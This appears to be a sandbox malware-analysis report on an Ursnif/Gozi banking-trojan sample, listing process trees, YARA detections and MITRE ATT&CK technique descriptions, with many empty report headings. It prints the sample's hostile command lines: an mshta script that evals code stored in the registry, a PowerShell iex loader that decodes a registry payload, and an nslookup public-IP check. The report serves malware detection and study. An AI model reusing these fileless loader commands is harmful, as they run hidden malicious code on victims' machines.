JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: cmd.exe PID: 1440 Parent PID: 5576

General

Start time:	00:57:29
Start date:	16/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 1380 Parent PID: 1440

General

Start time:	00:57:29
Start date:	16/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff7979a0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6192 Parent PID: 1380

General

Start time:	00:57:30
Start date:	16/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2
Imagebase:	0x250000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6552 Parent PID: 1380

General

Start time:	00:58:07
Start date:	16/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2
Imagebase:	0x250000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6864 Parent PID: 1380

General

Start time:	00:58:12
Start date:	16/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2
Imagebase:	0x250000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6940 Parent PID: 1380

General

Start time:	00:58:15
Start date:	16/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2
Imagebase:	0x250000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: mshta.exe PID: 492 Parent PID: 3424

General

Start time:	00:58:23
Start date:	16/02/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff71e320000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000016.00000003.789528617.000001F2CB9EF000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	moderate

Analysis Process: powershell.exe PID: 5424 Parent PID: 492

General

Start time:	00:58:25
Start date:	16/02/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, Author: CCN-CERT
Reputation:	high

Analysis Process: conhost.exe PID: 5428 Parent PID: 5424

General

Start time:	00:58:25
Start date:	16/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: csc.exe PID: 4136 Parent PID: 5424

General

Start time:	00:58:32
Start date:	16/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
Imagebase:	0x7ff696a20000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exe PID: 5732 Parent PID: 4136

General

Start time:	00:58:34
Start date:	16/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
Imagebase:	0x7ff768940000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: csc.exe PID: 6124 Parent PID: 5424

General

Start time:	00:58:37
Start date:	16/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
Imagebase:	0x7ff696a20000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: cvtres.exe PID: 2920 Parent PID: 6124

General

Start time:	00:58:38
Start date:	16/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
Imagebase:	0x7ff768940000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exe PID: 3424 Parent PID: 5424

General

Start time:	00:58:44
Start date:	16/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, Author: CCN-CERT Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, Author: CCN-CERT

Analysis Process: control.exe PID: 5528 Parent PID: 5876

General

Start time:	00:58:44
Start date:	16/02/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff635e60000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, Author: CCN-CERT Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, Author: CCN-CERT

Analysis Process: RuntimeBroker.exe PID: 3656 Parent PID: 3424

General

Start time:	00:58:52
Start date:	16/02/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, Author: CCN-CERT

Analysis Process: rundll32.exe PID: 6488 Parent PID: 5528

General

Start time:	00:58:52
Start date:	16/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff6c5cf0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, Author: CCN-CERT Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, Author: CCN-CERT

Analysis Process: RuntimeBroker.exe PID: 4268 Parent PID: 3424

General

Start time:	00:58:56
Start date:	16/02/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, Author: CCN-CERT

Analysis Process: RuntimeBroker.exe PID: 4772 Parent PID: 3424

General

Start time:	00:59:00
Start date:	16/02/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, Author: CCN-CERT

Analysis Process: cmd.exe PID: 6908 Parent PID: 3424

General

Start time:	00:59:02
Start date:	16/02/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre